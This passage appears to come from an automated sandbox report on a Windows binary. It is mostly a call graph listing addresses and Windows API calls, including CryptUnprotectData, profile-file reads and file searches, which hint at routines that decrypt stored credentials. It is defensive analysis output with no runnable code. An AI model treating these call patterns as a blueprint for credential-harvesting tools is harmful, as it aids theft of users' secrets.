27 API calls 39046->39048 39047->38343 39047->38345 39047->38346 39049 40438d GetProcAddress 39048->39049 39050 40b273 27 API calls 39049->39050 39051 4043a7 GetProcAddress 39050->39051 39052 40b273 27 API calls 39051->39052 39053 4043ba GetProcAddress 39052->39053 39054 40b273 27 API calls 39053->39054 39055 4043ce GetProcAddress 39054->39055 39056 40b273 27 API calls 39055->39056 39057 4043e2 GetProcAddress 39056->39057 39058 4043f1 39057->39058 39059 40440c FreeLibrary 39058->39059 39060 4043f7 39058->39060 39059->39047 39060->39047 39062 404413 FreeLibrary 39061->39062 39063 40441e 39061->39063 39062->39063 39063->38360 39064->38356 39066 40447e 39065->39066 39067 40442e 39065->39067 39069 404485 CryptUnprotectData 39066->39069 39070 40449c 39066->39070 39068 40b2cc 27 API calls 39067->39068 39071 404438 39068->39071 39069->39070 39070->38356 39072 40a804 8 API calls 39071->39072 39073 40443e 39072->39073 39074 404445 39073->39074 39075 404467 39073->39075 39076 40b273 27 API calls 39074->39076 39075->39066 39078 404475 FreeLibrary 39075->39078 39077 40444f GetProcAddress 39076->39077 39077->39075 39079 404460 39077->39079 39078->39066 39079->39075 39081 4135f6 39080->39081 39082 4135eb FreeLibrary 39080->39082 39081->38363 39082->39081 39084 4449c4 39083->39084 39085 444a52 39083->39085 39086 40b2cc 27 API calls 39084->39086 39085->38380 39085->38381 39087 4449cb 39086->39087 39088 40a804 8 API calls 39087->39088 39089 4449d1 39088->39089 39090 40b273 27 API calls 39089->39090 39091 4449dc GetProcAddress 39090->39091 39092 40b273 27 API calls 39091->39092 39093 4449f3 GetProcAddress 39092->39093 39094 40b273 27 API calls 39093->39094 39104->38391 39105->38391 39106->38391 39107->38391 39108->38382 39110 403a29 39109->39110 39124 403bed memset memset 39110->39124 39112 403ae7 39137 40b1ab ??3@YAXPAX ??3@YAXPAX 39112->39137 39113 403a3f memset 39116 403a2f 39113->39116 39115 403aef 39115->38399 39116->39112 39116->39113 39117 409d1f 6 API calls 39116->39117 39118 409b98 GetFileAttributesW 39116->39118 39119 40a8d0 7 API calls 39116->39119 39117->39116 39118->39116 39119->39116 39121 40a051 GetFileTime FindCloseChangeNotification 39120->39121 39122 4039ca CompareFileTime 39120->39122 39121->39122 39122->38399 39123->38398 39125 414c2e 17 API calls 39124->39125 39126 403c38 39125->39126 39127 409719 2 API calls 39126->39127 39128 403c3f wcscat 39127->39128 39129 414c2e 17 API calls 39128->39129 39130 403c61 39129->39130 39131 409719 2 API calls 39130->39131 39132 403c68 wcscat 39131->39132 39138 403af5 39132->39138 39135 403af5 20 API calls 39136 403c95 39135->39136 39136->39116 39137->39115 39139 403b02 39138->39139 39140 40ae18 9 API calls 39139->39140 39148 403b37 39140->39148 39141 403bdb 39143 40aebe FindClose 39141->39143 39142 40add4 wcscmp wcscmp 39142->39148 39144 403be6 39143->39144 39144->39135 39145 40ae18 9 API calls 39145->39148 39146 40ae51 9 API calls 39146->39148 39147 40aebe FindClose 39147->39148 39148->39141 39148->39142 39148->39145 39148->39146 39148->39147 39149 40a8d0 7 API calls 39148->39149 39149->39148 39151 409d1f 6 API calls 39150->39151 39152 404190 39151->39152 39165 409b98 GetFileAttributesW 39152->39165 39154 40419c 39155 4041a7 6 API calls 39154->39155 39156 40435c 39154->39156 39160 40424f 39155->39160 39156->38420 39158 40425e memset 39159 404296 wcscpy 39158->39159 39158->39160 39159->39160 39160->39156 39160->39158 39161 409d1f 6 API calls 39160->39161 39162 40a8ab 9 API calls 39160->39162 39166 414842 39160->39166 39161->39160 39163 4042b6 memset memset _snwprintf wcscpy 39162->39163 39163->39160 39164->38424 39165->39154 39169 41443e 39166->39169 39168 414866 39168->39160 39170 41444b 39169->39170 39171 414451 39170->39171 39172 4144a3 GetPrivateProfileStringW 39170->39172 39173 414491 39171->39173 39174 414455 wcschr 39171->39174 39172->39168 39176 414495 WritePrivateProfileStringW 39173->39176 39174->39173 39175 414463 _snwprintf 39174->39175 39175->39176 39176->39168 39177->38429 39179 40b2cc 27 API calls 39178->39179 39180 409615 39179->39180 39181 409d1f 6 API calls 39180->39181 39182 409625 39181->39182 39207 409b98 GetFileAttributesW 39182->39207 39184 409634 39185 409648 39184->39185 39208 4091b8 memset 39184->39208 39186 40b2cc 27 API calls 39185->39186 39189 408801 39185->39189 39188 40965d 39186->39188 39190 409d1f 6 API calls 39188->39190 39189->38432 39189->38459 39191 40966d 39190->39191 39260 409b98 GetFileAttributesW 39191->39260 39193 40967c 39193->39189 39194 409681 39193->39194 39261 409529 72 API calls 39194->39261 39196 409690 39196->39189 39207->39184 39262 40a6e6 WideCharToMultiByte 39208->39262 39210 409202 39263 444432 39210->39263 39213 40b273 27 API calls 39214 409236 39213->39214 39309 438552 39214->39309 39240 40951d 39240->39185 39260->39193 39261->39196 39262->39210 39359 4438b5 39263->39359 39265 44444c 39266 409215 39265->39266 39373 415a6d 39265->39373 39266->39213 39266->39240 39268 4442e6 11 API calls 39270 44469e 39268->39270 39269 444486 39271 4444b9 memcpy 39269->39271 39297 4444a4 39269->39297 39270->39266 39272 443d90 111 API calls 39270->39272 39377 415258 39271->39377 39272->39266 39274 444524 39275 444541 39274->39275 39276 44452a 39274->39276 39297->39268 39494 438460 39309->39494 39360 4438d0 39359->39360 39369 4438c9 39359->39369 39447 415378 memcpy memcpy 39360->39447 39369->39265 39374 415a77 39373->39374 39375 415a8d 39374->39375 39376 415a7e memset 39374->39376 39375->39269 39376->39375 39378 4438b5 11 API calls 39377->39378 39379 41525d 39378->39379 39379->39274 39506 41703f 39494->39506 39496 43847a 39497 43848a 39496->39497 39498 43847e 39496->39498 39507 41705c 39506->39507 39511 417044 39506->39511 39508 417075 39507->39508 39509 41707a 11 API calls 39507->39509 39508->39496 39509->39511 39510 416760 11 API calls 39512 417055 39510->39512 39511->39510 39511->39512 39512->39496 39633 413f4f 39606->39633 39609 413f37 K32GetModuleFileNameExW 39610 413f4a 39609->39610 39610->38492 39612 41396c wcschr 39611->39612 39614 413969 wcscpy 39611->39614 39612->39614 39615 41398e 39612->39615 39616 413a3a 39614->39616 39638 4097f7 wcslen wcslen _memicmp 39615->39638 39616->38492 39618 41399a 39619 4139a4 memset 39618->39619 39620 4139e6 39618->39620 39639 409dd5 GetWindowsDirectoryW wcscpy 39619->39639 39622 413a31 wcscpy 39620->39622 39623 4139ec memset 39620->39623 39622->39616 39640 409dd5 GetWindowsDirectoryW wcscpy 39623->39640 39624 4139c9 wcscpy wcscat 39624->39616 39626 413a11 memcpy wcscat 39626->39616 39628 413cb0 GetModuleHandleW 39627->39628 39629 413cda 39627->39629 39628->39629 39630 413cbf GetProcAddress 39628->39630 39631 413ce3 GetProcessTimes 39629->39631 39632 413cf6 39629->39632 39630->39629 39631->38494 39632->38494 39634 413f2f 39633->39634 39635 413f54 39633->39635 39634->39609 39634->39610 39636 40a804 8 API calls 39635->39636 39637 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39636->39637 39637->39634 39638->39618 39639->39624 39640->39626 39641->38515 39642->38537 39644 409cf9 GetVersionExW 39643->39644 39645 409d0a 39643->39645 39644->39645 39645->38544 39645->38548 39646->38551 39647->38554 39648->38556 39649->38621 39651 40bba5 39650->39651 39695 40cc26 39651->39695 39654 40bd4b 39716 40cc0c 39654->39716 39659 40b2cc 27 API calls 39660 40bbef 39659->39660 39723 40ccf0 _wcsicmp 39660->39723 39662 40bbf5 39662->39654 39724 40ccb4 6 API calls 39662->39724 39664 40bc26 39665 40cf04 17 API calls 39664->39665 39666 40bc2e 39665->39666 39667 40bd43 39666->39667 39669 40b2cc 27 API calls 39666->39669 39668 40cc0c 4 API calls 39667->39668 39668->39654 39670 40bc40 39669->39670 39725 40ccf0 _wcsicmp 39670->39725 39672 40bc46 39672->39667 39673 40bc61 memset memset WideCharToMultiByte 39672->39673 39726 40103c strlen EntryPoint EntryPoint EntryPoint EntryPoint 39673->39726 39675 40bcc0 39676 40b273 27 API calls 39675->39676 39677 40bcd0 memcmp 39676->39677 39677->39667 39678 40bce2 39677->39678 39679 404423 38 API calls 39678->39679 39680 40bd10 39679->39680 39680->39667 39681 40bd3a LocalFree 39680->39681 39682 40bd1f memcpy 39680->39682 39681->39667 39682->39681 39683->38636 39684->38673 39685->38673 39686->38673 39687->38673 39688->38673 39689->38673 39690->38673 39691->38673 39692->38673 39693->38648 39694->38670 39727 4096c3 CreateFileW 39695->39727 39697 40cc34 39698 40cc3d GetFileSize 39697->39698 39699 40bbca 39697->39699 39700 40afcf 2 API calls 39698->39700 39699->39654 39707 40cf04 39699->39707 39701 40cc64 39700->39701 39728 40a2ef ReadFile 39701->39728 39703 40cc71 39729 40ab4a MultiByteToWideChar 39703->39729 39705 40cc95 FindCloseChangeNotification 39706 40b04b ??3@YAXPAX 39705->39706 39706->39699 39708 40b633 ??3@YAXPAX 39707->39708 39709 40cf14 39708->39709 39735 40b1ab ??3@YAXPAX ??3@YAXPAX 39709->39735 39711 40bbdd 39711->39654 39711->39659 39712 40cf1b 39712->39711 39714 40cfef 39712->39714 39736 40cd4b 39712->39736 39715 40cd4b 14 API calls 39714->39715 39715->39711 39717 40b633 ??3@YAXPAX 39716->39717 39718 40cc15 39717->39718 39719 40aa04 ??3@YAXPAX 39718->39719 39720 40cc1d 39719->39720 39782 40b1ab ??3@YAXPAX ??3@YAXPAX 39720->39782 39722 40b7d4 memset CreateFileW 39722->38627 39722->38628 39723->39662 39724->39664 39725->39672 39726->39675 39727->39697 39728->39703 39730 40ab93 39729->39730 39731 40ab6b 39729->39731 39730->39705 39732 40a9ce 4 API calls 39731->39732 39733 40ab74 39732->39733 39734 40ab7c MultiByteToWideChar 39733->39734 39734->39730 39735->39712 39737 40cd7b 39736->39737 39770 40aa29 6 API calls 39737->39770 39739 40cef5 39740 40aa04 ??3@YAXPAX 39739->39740 39741 40cefd 39740->39741 39741->39712 39742 40cd89 39742->39739 39771 40aa29 6 API calls 39742->39771 39744 40ce1d 39772 40aa29 6 API calls 39744->39772 39746 40ce3e 39747 40ce6a 39746->39747 39773 40abb7 wcslen memmove 39746->39773 39748 40ce9f 39747->39748 39776 40abb7 wcslen memmove 39747->39776 39779 40a8d0 7 API calls 39748->39779 39751 40ce56 39774 40aa71 wcslen 39751->39774 39753 40ce8b 39777 40aa71 wcslen 39753->39777 39754 40ceb5 39780 40a8d0 7 API calls 39754->39780 39757 40ce5e 39775 40abb7 wcslen memmove 39757->39775 39758 40ce93 39778 40abb7 wcslen memmove 39758->39778 39762 40cecb 39781 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39762->39781 39764 40cedd 39765 40aa04 ??3@YAXPAX 39764->39765 39766 40cee5 39765->39766 39767 40aa04 ??3@YAXPAX 39766->39767 39768 40ceed 39767->39768 39769 40aa04 ??3@YAXPAX 39768->39769 39769->39739 39770->39742 39771->39744 39772->39746 39773->39751 39774->39757 39775->39747 39776->39753 39777->39758 39778->39748 39779->39754 39780->39762 39781->39764 39782->39722 39783->38689 39784->38696 39785 4415ea 39793 4304b2 39785->39793 39787 4415fe 39788 442bd4 39787->39788 39789 4418e2 39787->39789 39790 4418ea 39787->39790 39788->39790 39841 441409 memset 39788->39841 39789->39790 39840 4414a9 12 API calls 39789->39840 39842 43041c 12 API calls 39793->39842 39795 4304cd 39800 430557 39795->39800 39843 43034a 39795->39843 39797 4304f3 39797->39800 39847 430468 11 API calls 39797->39847 39799 430506 39799->39800 39801 43057b 39799->39801 39848 43817e 39799->39848 39800->39787 39802 415a91 memset 39801->39802 39804 430584 39802->39804 39804->39800 39853 4397fd memset 39804->39853 39806 4305e4 39806->39800 39854 4328e4 12 API calls 39806->39854 39808 43052d 39808->39800 39808->39801 39809 430542 39808->39809 39809->39800 39852 4169a7 11 API calls 39809->39852 39811 4305fa 39812 430609 39811->39812 39855 423383 11 API calls 39811->39855 39856 423330 11 API calls 39812->39856 39815 430634 39857 423399 11 API calls 39815->39857 39817 430648 39858 4233ae 11 API calls 39817->39858 39819 43066b 39859 423330 11 API calls 39819->39859 39821 43067d 39860 4233ae 11 API calls 39821->39860 39823 430695 39861 423330 11 API calls 39823->39861 39825 4306d6 39863 423330 11 API calls 39825->39863 39826 4306a7 39826->39825 39827 4306c0 39826->39827 39862 4233ae 11 API calls 39827->39862 39830 4306d1 39864 430369 17 API calls 39830->39864 39832 4306f3 39865 423330 11 API calls 39832->39865 39834 430704 39866 423330 11 API calls 39834->39866 39836 430710 39867 423330 11 API calls 39836->39867 39838 43071e 39868 423383 11 API calls 39838->39868 39840->39790 39841->39788 39842->39795 39844 43034e 39843->39844 39846 430359 39843->39846 39869 415c23 memcpy 39844->39869 39846->39797 39847->39799 39849 438187 39848->39849 39850 438192 39848->39850 39870 4380f6 39849->39870 39850->39808 39852->39800 39853->39806 39854->39811 39855->39812 39856->39815 39857->39817 39858->39819 39859->39821 39860->39823 39861->39826 39862->39830 39863->39830 39864->39832 39865->39834 39866->39836 39867->39838 39868->39800 39869->39846 39873 43811f 39870->39873 39871 438164 39871->39850 39873->39871 39875 437e5e 39873->39875 39898 4300e8 memset memset memcpy 39873->39898 39899 437d3c 39875->39899 39877 437eb3 39877->39873 39878 437ea9 39878->39877 39883 437f22 39878->39883 39914 41f432 39878->39914 39881 437f06 39964 415c56 11 API calls 39881->39964 39885 437f7f 39883->39885 39886 432d4e 3 API calls 39883->39886 39884 437f95 39965 415c56 11 API calls 39884->39965 39885->39884 39887 43802b 39885->39887 39886->39885 39925 4165ff 39887->39925 39893 43806b 39894 438094 39893->39894 39966 42f50e 138 API calls 39893->39966 39896 437fa3 39894->39896 39967 4300e8 memset memset memcpy 39894->39967 39896->39877 39968 41f638 104 API calls 39896->39968 39898->39873 39900 437d69 39899->39900 39903 437d80 39899->39903 39969 437ccb 11 API calls 39900->39969 39902 437d76 39902->39878 39903->39902 39904 437da3 39903->39904 39905 437d90 39903->39905 39907 438460 134 API calls 39904->39907 39905->39902 39973 437ccb 11 API calls 39905->39973 39910 437dcb 39907->39910 39908 437de8 39972 424f26 123 API calls 39908->39972 39910->39908 39970 444283 13 API calls 39910->39970 39912 437dfc 39971 437ccb 11 API calls 39912->39971 39915 41f54d 39914->39915 39920 41f44f 39914->39920 39916 41f466 39915->39916 40003 41c635 memset memset 39915->40003 39916->39881 39916->39883 39920->39916 39923 41f50b 39920->39923 39974 41f1a5 39920->39974 39999 41c06f memcmp 39920->39999 40000 41f3b1 90 API calls 39920->40000 40001 41f398 86 API calls 39920->40001 39923->39915 39923->39916 40002 41c295 86 API calls 39923->40002 39926 4165a0 11 API calls 39925->39926 39927 41660d 39926->39927 39928 437371 39927->39928 39929 41703f 11 API calls 39928->39929 39930 437399 39929->39930 39931 43739d 39930->39931 39933 4373ac 39930->39933 40089 4446ea 11 API calls 39931->40089 39934 416935 16 API calls 39933->39934 39958 4373ca 39934->39958 39935 437584 39936 4375bc 39935->39936 40096 42453e 123 API calls 39935->40096 39939 415c7d 16 API calls 39936->39939 39937 438460 134 API calls 39937->39958 39940 4375d2 39939->39940 39942 4442e6 11 API calls 39940->39942 39944 4373a7 39940->39944 39941 4251c4 137 API calls 39941->39958 39943 4375e2 39942->39943 39943->39944 40097 444283 13 API calls 39943->40097 39944->39893 39947 415a91 memset 39947->39958 39949 43758f 40095 42453e 123 API calls 39949->40095 39952 4375f4 39956 437620 39952->39956 39957 43760b 39952->39957 39953 43759f 39955 416935 16 API calls 39953->39955 39955->39935 39960 416935 16 API calls 39956->39960 40098 444283 13 API calls 39957->40098 39958->39935 39958->39937 39958->39941 39958->39947 39958->39949 39963 437d3c 135 API calls 39958->39963 40090 425433 13 API calls 39958->40090 40091 425413 17 API calls 39958->40091 40092 42533e 16 API calls 39958->40092 40093 42538f 16 API calls 39958->40093 40094 42453e 123 API calls 39958->40094 39960->39944 39962 437612 memcpy 39962->39944 39963->39958 39964->39877 39965->39896 39966->39894 39967->39896 39968->39877 39969->39902 39970->39912 39971->39908 39972->39902 39973->39902 40004 41bc3b 39974->40004 39977 41edad 86 API calls 39978 41f1cb 39977->39978 39979 41f1f5 memcmp 39978->39979 39980 41f20e 39978->39980 39997 41f282 39978->39997 39979->39980 39981 41f21b memcmp 39980->39981 39980->39997 39983 41f23d 39981->39983 39991 41f326 39981->39991 39982 41ee6b 86 API calls 39982->39997 39984 41f28e memcmp 39983->39984 39983->39991 40028 41c8df 56 API calls 39983->40028 39985 41f2a9 39984->39985 39984->39991 39988 41f308 39985->39988 39989 41f2d8 39985->39989 39985->39991 39987 41f269 39987->39991 39992 41f287 39987->39992 39993 41f27a 39987->39993 39988->39991 40029 4446ce 11 API calls 39988->40029 39990 41ee6b 86 API calls 39989->39990 39994 41f2e0 39990->39994 39991->39982 39991->39997 39992->39984 39995 41ee6b 86 API calls 39993->39995 39998 41b1ca memset 39994->39998 39995->39997 39997->39920 39998->39997 39999->39920 40000->39920 40001->39920 40002->39915 40003->39916 40005 41be0b 40004->40005 40007 41bc54 40004->40007 40016 41bd61 40005->40016 40038 41ae17 34 API calls 40005->40038 40007->40005 40007->40016 40018 41bc8d 40007->40018 40030 41baf0 55 API calls 40007->40030 40009 41be45 40009->39977 40009->39997 40011 41be04 40037 41aee4 56 API calls 40011->40037 40013 41bd42 40013->40011 40014 41bdd8 memset 40013->40014 40015 41bdba 40013->40015 40013->40016 40017 41bde7 memcmp 40014->40017 40027 4175ed 6 API calls 40015->40027 40016->40009 40039 41a25f memset 40016->40039 40017->40011 40020 41bdfd 40017->40020 40018->40013 40018->40016 40021 41bd18 40018->40021 40031 4151e3 40018->40031 40019 41bdcc 40019->40016 40019->40017 40036 41a1b0 memset 40020->40036 40021->40013 40021->40016 40035 41a9da 86 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 40021->40035 40027->40019 40028->39987 40029->39991 40030->40018 40040 41837f 40031->40040 40034 444706 11 API calls 40034->40021 40035->40013 40036->40011 40037->40005 40038->40016 40039->40009 40041 4183c1 40040->40041 40045 4183ca 40040->40045 40087 418197 25 API calls 40041->40087 40044 4151f9 40044->40021 40044->40034 40045->40044 40061 418160 40045->40061 40046 4183e5 40046->40044 40070 41739b 40046->40070 40049 418444 CreateFileW 40051 418477 40049->40051 40050 41845f CreateFileA 40050->40051 40052 4184c2 memset 40051->40052 40053 41847e GetLastError ??3@YAXPAX 40051->40053 40073 418758 40052->40073 40055 4184b5 40053->40055 40056 418497 40053->40056 40088 444706 11 API calls 40055->40088 40059 41837f 49 API calls 40056->40059 40059->40044 40062 41739b GetVersionExW 40061->40062 40063 418165 40062->40063 40065 4173e4 MultiByteToWideChar malloc MultiByteToWideChar ??3@YAXPAX 40063->40065 40066 418178 40065->40066 40067 41817f 40066->40067 40068 41748f AreFileApisANSI WideCharToMultiByte malloc WideCharToMultiByte ??3@YAXPAX 40066->40068 40067->40046 40069 418188 ??3@YAXPAX 40068->40069 40069->40046 40071 4173d6 40070->40071 40072 4173ad GetVersionExW 40070->40072 40071->40049 40071->40050 40072->40071 40074 418680 43 API calls 40073->40074 40075 418782 40074->40075 40076 418506 ??3@YAXPAX 40075->40076 40077 418160 11 API calls 40075->40077 40076->40044 40078 418799 40077->40078 40078->40076 40079 41739b GetVersionExW 40078->40079 40080 4187a7 40079->40080 40083 4187da 40080->40083 40084 4187ad GetDiskFreeSpaceW 40080->40084 40082 4187ec GetDiskFreeSpaceA 40085 418800 ??3@YAXPAX 40082->40085 40083->40082 40086 4187e8 40083->40086 40084->40085 40085->40076 40086->40082 40087->40045 40088->40044 40089->39944 40090->39958 40091->39958 40092->39958 40093->39958 40094->39958 40095->39953 40096->39936 40097->39952 40098->39962 40099 4147f3 40102 414561 40099->40102 40101 414813 40103 41456d 40102->40103 40104 41457f GetPrivateProfileIntW 40102->40104 40107 4143f1 memset _itow WritePrivateProfileStringW 40103->40107 40104->40101 40106 41457a 40106->40101 40107->40106 40108 44def7 40109 44df07 40108->40109 40110 44df00 ??3@YAXPAX 40108->40110 40111 44df17 40109->40111 40112 44df10 ??3@YAXPAX 40109->40112 40110->40109 40113 44df27 40111->40113 40114 44df20 ??3@YAXPAX 40111->40114 40112->40111 40115 44df37 40113->40115 40116 44df30 ??3@YAXPAX 40113->40116 40114->40113 40116->40115 40117 4148b6 FindResourceW 40118 4148cf SizeofResource 40117->40118 40121 4148f9 40117->40121 40119 4148e0 LoadResource 40118->40119 40118->40121 40120 4148ee LockResource 40119->40120 40119->40121 40120->40121 40122 441b3f 40132 43a9f6 40122->40132 40124 441b61 40305 4386af memset 40124->40305 40126 44189a 40127 4418e2 40126->40127 40128 442bd4 40126->40128 40129 4418ea 40127->40129 40306 4414a9 12 API calls 40127->40306 40128->40129 40307 441409 memset 40128->40307 40133 43aa20 40132->40133 40134 43aadf 40132->40134 40133->40134 40135 43aa34 memset 40133->40135 40134->40124 40136 43aa56 40135->40136 40137 43aa4d 40135->40137 40308 43a6e7 40136->40308 40316 42c02e memset 40137->40316 40142 43aad3 40318 4169a7 11 API calls 40142->40318 40143 43aaae 40143->40134 40143->40142 40158 43aae5 40143->40158 40144 43ac18 40147 43ac47 40144->40147 40320 42bbd5 memcpy memcpy memcpy memset memcpy 40144->40320 40148 43aca8 40147->40148 40321 438eed 16 API calls 40147->40321 40152 43acd5 40148->40152 40323 4233ae 11 API calls 40148->40323 40151 43ac87 40322 4233c5 16 API calls 40151->40322 40324 423426 11 API calls 40152->40324 40156 43ace1 40325 439811 163 API calls 40156->40325 40157 43a9f6 161 API calls 40157->40158 40158->40134 40158->40144 40158->40157 40319 439bbb 22 API calls 40158->40319 40160 43acfd 40165 43ad2c 40160->40165 40326 438eed 16 API calls 40160->40326 40162 43ad19 40327 4233c5 16 API calls 40162->40327 40164 43ad58 40328 44081d 163 API calls 40164->40328 40165->40164 40168 43add9 40165->40168 40332 423426 11 API calls 40168->40332 40169 43ae3a memset 40170 43ae73 40169->40170 40333 42e1c0 147 API calls 40170->40333 40171 43adab 40330 438c4e 163 API calls 40171->40330 40172 43ad6c 40172->40134 40172->40171 40329 42370b memset memcpy memset 40172->40329 40176 43adcc 40331 440f84 12 API calls 40176->40331 40177 43ae96 40334 42e1c0 147 API calls 40177->40334 40180 43aea8 40181 43aec1 40180->40181 40335 42e199 147 API calls 40180->40335 40183 43af00 40181->40183 40336 42e1c0 147 API calls 40181->40336 40183->40134 40186 43af1a 40183->40186 40187 43b3d9 40183->40187 40337 438eed 16 API calls 40186->40337 40192 43b3f6 40187->40192 40198 43b4c8 40187->40198 40188 43b60f 40188->40134 40396 4393a5 17 API calls 40188->40396 40191 43af2f 40338 4233c5 16 API calls 40191->40338 40378 432878 12 API calls 40192->40378 40194 43af51 40339 423426 11 API calls 40194->40339 40196 43af7d 40340 423426 11 API calls 40196->40340 40197 43b4f2 40385 43a76c 21 API calls 40197->40385 40198->40197 40384 42bbd5 memcpy memcpy memcpy memset memcpy 40198->40384 40203 43b462 40380 423330 11 API calls 40203->40380 40204 43af94 40341 423330 11 API calls 40204->40341 40205 43b529 40386 44081d 163 API calls 40205->40386 40209 43b544 40213 43b55c 40209->40213 40387 42c02e memset 40209->40387 40210 43b428 40210->40203 40379 432b60 16 API calls 40210->40379 40211 43afca 40342 423330 11 API calls 40211->40342 40212 43b47e 40215 43b497 40212->40215 40381 42374a memcpy memset memcpy memcpy memcpy 40212->40381 40388 43a87a 163 API calls 40213->40388 40382 4233ae 11 API calls 40215->40382 40218 43afdb 40343 4233ae 11 API calls 40218->40343 40221 43b4b1 40383 423399 11 API calls 40221->40383 40223 43b56c 40233 43b58a 40223->40233 40389 423330 11 API calls 40223->40389 40225 43afee 40344 44081d 163 API calls 40225->40344 40230 43b592 40391 43a82f 16 API calls 40230->40391 40390 440f84 12 API calls 40233->40390 40234 43b4c1 40392 42db80 163 API calls 40234->40392 40235 43b5b4 40393 438c4e 163 API calls 40235->40393 40237 43b5cf 40394 42c02e memset 40237->40394 40238 43b005 40238->40134 40244 43b01f 40238->40244 40345 42d836 163 API calls 40238->40345 40240 43b1ef 40355 4233c5 16 API calls 40240->40355 40242 43b212 40356 423330 11 API calls 40242->40356 40244->40240 40353 423330 11 API calls 40244->40353 40354 42d71d 163 API calls 40244->40354 40246 43b087 40346 4233ae 11 API calls 40246->40346 40247 43add4 40247->40188 40395 438f86 16 API calls 40247->40395 40250 43b22a 40357 42ccb5 11 API calls 40250->40357 40253 43b23f 40358 4233ae 11 API calls 40253->40358 40254 43b10f 40349 423330 11 API calls 40254->40349 40256 43b257 40359 4233ae 11 API calls 40256->40359 40260 43b129 40350 4233ae 11 API calls 40260->40350 40261 43b26e 40360 4233ae 11 API calls 40261->40360 40262 43b09a 40262->40254 40347 42cc15 19 API calls 40262->40347 40348 4233ae 11 API calls 40262->40348 40266 43b282 40361 43a87a 163 API calls 40266->40361 40267 43b13c 40351 440f84 12 API calls 40267->40351 40269 43b29d 40362 423330 11 API calls 40269->40362 40272 43b15f 40352 4233ae 11 API calls 40272->40352 40273 43b2af 40275 43b2b8 40273->40275 40276 43b2ce 40273->40276 40363 4233ae 11 API calls 40275->40363 40364 440f84 12 API calls 40276->40364 40279 43b2c9 40366 4233ae 11 API calls 40279->40366 40280 43b2da 40365 42370b memset memcpy memset 40280->40365 40283 43b2f9 40367 423330 11 API calls 40283->40367 40285 43b30b 40368 423330 11 API calls 40285->40368 40287 43b325 40369 423399 11 API calls 40287->40369 40289 43b332 40370 4233ae 11 API calls 40289->40370 40291 43b354 40371 423399 11 API calls 40291->40371 40293 43b364 40372 43a82f 16 API calls 40293->40372 40295 43b370 40373 42db80 163 API calls 40295->40373 40297 43b380 40374 438c4e 163 API calls 40297->40374 40299 43b39e 40375 423399 11 API calls 40299->40375 40301 43b3ae 40376 43a76c 21 API calls 40301->40376 40303 43b3c3 40377 423399 11 API calls 40303->40377 40305->40126 40306->40129 40307->40128 40309 43a6f5 40308->40309 40315 43a765 40308->40315 40309->40315 40397 42a115 40309->40397 40313 43a73d 40314 42a115 147 API calls 40313->40314 40313->40315 40314->40315 40315->40134 40317 4397fd memset 40315->40317 40316->40136 40317->40143 40318->40134 40319->40158 40320->40147 40321->40151 40322->40148 40323->40152 40324->40156 40325->40160 40326->40162 40327->40165 40328->40172 40329->40171 40330->40176 40331->40247 40332->40169 40333->40177 40334->40180 40335->40181 40336->40181 40337->40191 40338->40194 40339->40196 40340->40204 40341->40211 40342->40218 40343->40225 40344->40238 40345->40246 40346->40262 40347->40262 40348->40262 40349->40260 40350->40267 40351->40272 40352->40244 40353->40244 40354->40244 40355->40242 40356->40250 40357->40253 40358->40256 40359->40261 40360->40266 40361->40269 40362->40273 40363->40279 40364->40280 40365->40279 40366->40283 40367->40285 40368->40287 40369->40289 40370->40291 40371->40293 40372->40295 40373->40297 40374->40299 40375->40301 40376->40303 40377->40247 40378->40210 40379->40203 40380->40212 40381->40215 40382->40221 40383->40234 40384->40197 40385->40205 40386->40209 40387->40213 40388->40223 40389->40233 40390->40230 40391->40234 40392->40235 40393->40237 40394->40247 40395->40188 40396->40134 40398 42a175 40397->40398 40400 42a122 40397->40400 40398->40315 40403 42b13b 147 API calls 40398->40403 40400->40398 40401 42a115 147 API calls 40400->40401 40404 43a174 40400->40404 40428 42a0a8 147 API calls 40400->40428 40401->40400 40403->40313 40416 43a196 40404->40416 40418 43a19e 40404->40418 40405 43a306 40405->40416 40441 4388c4 14 API calls 40405->40441 40408 415a91 memset 40408->40418 40409 43a642 40409->40416 40445 4169a7 11 API calls 40409->40445 40411 4165ff 11 API calls 40411->40418 40414 43a635 40444 42c02e memset 40414->40444 40416->40400 40418->40405 40418->40408 40418->40411 40418->40416 40419 42a115 147 API calls 40418->40419 40429 42ff8c 40418->40429 40437 439504 13 API calls 40418->40437 40438 4312d0 147 API calls 40418->40438 40439 42be4c memcpy memcpy memcpy memset memcpy 40418->40439 40440 43a121 11 API calls 40418->40440 40419->40418 40421 4169a7 11 API calls 40422 43a325 40421->40422 40422->40409 40422->40414 40422->40416 40422->40421 40423 42b5b5 memset memcpy 40422->40423 40424 42bf4c 14 API calls 40422->40424 40426 4165ff 11 API calls 40422->40426 40442 42b63e 14 API calls 40422->40442 40443 42bfcf memcpy 40422->40443 40423->40422 40424->40422 40426->40422 40428->40400 40430 43817e 139 API calls 40429->40430 40431 42ff99 40430->40431 40432 42ffe3 40431->40432 40433 42ffd0 40431->40433 40436 42ff9d 40431->40436 40447 4169a7 11 API calls 40432->40447 40446 4169a7 11 API calls 40433->40446 40436->40418 40437->40418 40438->40418 40439->40418 40440->40418 40441->40422 40442->40422 40443->40422 40444->40409 40445->40416 40446->40436 40447->40436 40448 441819 40451 430737 40448->40451 40450 441825 40452 430756 40451->40452 40464 43076d 40451->40464 40453 430774 40452->40453 40454 43075f 40452->40454 40456 43034a memcpy 40453->40456 40472 4169a7 11 API calls 40454->40472 40459 43077e 40456->40459 40457 4307ce 40458 430819 memset 40457->40458 40465 415b2c 40457->40465 40458->40464 40459->40457 40462 4307fa 40459->40462 40459->40464 40461 4307e9 40461->40458 40461->40464 40473 4169a7 11 API calls 40462->40473 40464->40450 40466 415b42 40465->40466 40470 415b46 40465->40470 40467 415b94 40466->40467 40468 415b5a 40466->40468 40466->40470 40469 4438b5 10 API calls 40467->40469 40468->40470 40471 415b79 memcpy 40468->40471 40469->40470 40470->40461 40471->40470 40472->40464 40473->40464 40474 41493c EnumResourceNamesW

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
